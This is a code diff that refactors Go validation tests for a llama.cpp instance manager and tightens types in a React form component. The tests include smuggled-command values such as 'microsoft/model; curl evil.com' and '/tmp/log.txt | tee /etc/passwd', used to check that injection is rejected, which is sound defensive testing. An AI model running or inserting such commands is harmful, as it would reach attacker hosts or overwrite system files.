+			err := validation.ValidateInstanceOptions(options)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
 			}
@@ -163,13 +172,13 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test with Lora field (array field)
-			options := &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options := &instance.CreateInstanceOptions{
+				LlamaServerOptions: llamacpp.LlamaServerOptions{
 					Lora: tt.array,
 				},
 			}

-			err := llamactl.ValidateInstanceOptions(options)
+			err := validation.ValidateInstanceOptions(options)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
 			}
@@ -181,13 +190,13 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 	// Test that injection in any field is caught
 	tests := []struct {
 		name string
-		options *llamactl.CreateInstanceOptions
+		options *instance.CreateInstanceOptions
 		wantErr bool
 	}{
 		{
 			name: "injection in model field",
-			options: &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options: &instance.CreateInstanceOptions{
+				LlamaServerOptions: llamacpp.LlamaServerOptions{
 					Model: "safe.gguf",
 					HFRepo: "microsoft/model; curl evil.com",
 				},
@@ -196,8 +205,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		},
 		{
 			name: "injection in log file",
-			options: &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options: &instance.CreateInstanceOptions{
+				LlamaServerOptions: llamacpp.LlamaServerOptions{
 					Model: "safe.gguf",
 					LogFile: "/tmp/log.txt | tee /etc/passwd",
 				},
@@ -206,8 +215,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		},
 		{
 			name: "all safe fields",
-			options: &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options: &instance.CreateInstanceOptions{
+				LlamaServerOptions: llamacpp.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 					HFRepo: "microsoft/DialoGPT-medium",
 					LogFile: "/tmp/llama.log",
@@ -221,7 +230,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			err := llamactl.ValidateInstanceOptions(tt.options)
+			err := validation.ValidateInstanceOptions(tt.options)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
 			}
@@ -231,11 +240,11 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {

 func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 	// Test that non-string fields don't interfere with validation
-	options := &llamactl.CreateInstanceOptions{
-		AutoRestart: boolPtr(true),
-		MaxRestarts: intPtr(5),
-		RestartDelay: intPtr(10),
-		LlamaServerOptions: llamactl.LlamaServerOptions{
+	options := &instance.CreateInstanceOptions{
+		AutoRestart: testutil.BoolPtr(true),
+		MaxRestarts: testutil.IntPtr(5),
+		RestartDelay: testutil.IntPtr(10),
+		LlamaServerOptions: llamacpp.LlamaServerOptions{
 			Port: 8080,
 			GPULayers: 32,
 			CtxSize: 4096,
@@ -247,17 +256,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 		},
 	}

-	err := llamactl.ValidateInstanceOptions(options)
+	err := validation.ValidateInstanceOptions(options)
 	if err != nil {
 		t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
 	}
 }
-
-// Helper functions for pointer fields
-func boolPtr(b bool) *bool {
-	return &b
-}
-
-func intPtr(i int) *int {
-	return &i
-}
@@ -7,8 +7,8 @@ import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'

 interface ZodFormFieldProps {
   fieldKey: keyof CreateInstanceOptions
-  value: any
-  onChange: (key: keyof CreateInstanceOptions, value: any) => void
+  value: string | number | boolean | string[] | undefined
+  onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
 }

 const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
@@ -18,7 +18,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
   // Get type from Zod schema
   const fieldType = getFieldType(fieldKey)

-  const handleChange = (newValue: any) => {
+  const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
     onChange(fieldKey, newValue)
   }

@@ -29,7 +29,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
         <div className="flex items-center space-x-2">
           <Checkbox
             id={fieldKey}
-            checked={value || false}
+            checked={typeof value === 'boolean' ? value : false}
             onCheckedChange={(checked) => handleChange(checked)}
           />
           <Label htmlFor={fieldKey} className="text-sm font-normal">
@@ -51,10 +51,14 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
           <Input
             id={fieldKey}
             type="number"
-            value={value || ''}
+            step="any" // This allows decimal numbers
+            value={typeof value === 'string' || typeof value === 'number' ? value : ''}
             onChange={(e) => {
               const numValue = e.target.value ? parseFloat(e.target.value) : undefined
-              handleChange(numValue)
+              // Only update if the parsed value is valid or the input is empty
+              if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
+                handleChange(numValue)
+              }
             }}
             placeholder={config.placeholder}
           />
@@ -101,7 +105,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
           <Input
             id={fieldKey}
             type="text"
-            value={value || ''}
+            value={typeof value === 'string' || typeof value === 'number' ? value : ''}
             onChange={(e) => handleChange(e.target.value || undefined)}
             placeholder={config.placeholder}
           />